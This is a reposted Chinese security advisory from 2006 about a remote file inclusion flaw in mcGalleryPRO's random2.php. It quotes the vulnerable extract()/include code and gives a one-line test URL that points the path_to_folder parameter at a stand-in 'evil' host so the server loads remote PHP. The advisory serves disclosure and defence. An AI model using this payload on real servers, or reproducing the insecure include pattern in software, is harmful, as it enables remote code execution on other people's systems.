[转载]MCGalleryPRO random2.php远程文件包含漏洞
信息来源:绿盟科技MCGalleryPRO random2.php远程文件包含漏洞
发布日期:2006-09-10
更新日期:2006-09-12
受影响系统:
mcGalleryPRO mcGalleryPRO 2006
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 19936
mcGalleryPRO是一款图片收藏管理程序。
mcGalleryPRO的random2.php文件没有正确过滤对path_to_folder参数的输入,允许攻击者通过包含本地或外部资源的任意文件执行PHP代码。
random2.php中有漏洞的代码如下:
if (!empty($_SERVER)) { extract($_SERVER, EXTR_OVERWRITE); }
if (!empty($_GET)) { extract($_GET, EXTR_OVERWRITE); }
if (!empty($_POST)) { extract($_POST, EXTR_OVERWRITE); }
if (!empty($_COOKIE)) { extract($_COOKIE, EXTR_OVERWRITE); }
if (!empty($_SESSION)) { extract($_SESSION, EXTR_OVERWRITE); }
include ("$path_to_folder/admin/common.php");
include ("$path_to_folder/lang/$lang_def");
<*来源:Solpot ([email]chris_hasibuan@yahoo.com[/email])
链接:[url]http://secunia.com/advisories/21850/[/url]
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
[url]http://somehost/path_to_mcgallerypro/random2.php?path_to_folder=http://evil[/url]
建议:
--------------------------------------------------------------------------------
厂商补丁:
mcGalleryPRO
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
[url]http://mcgallerypro.com/[/url]
页:
[1]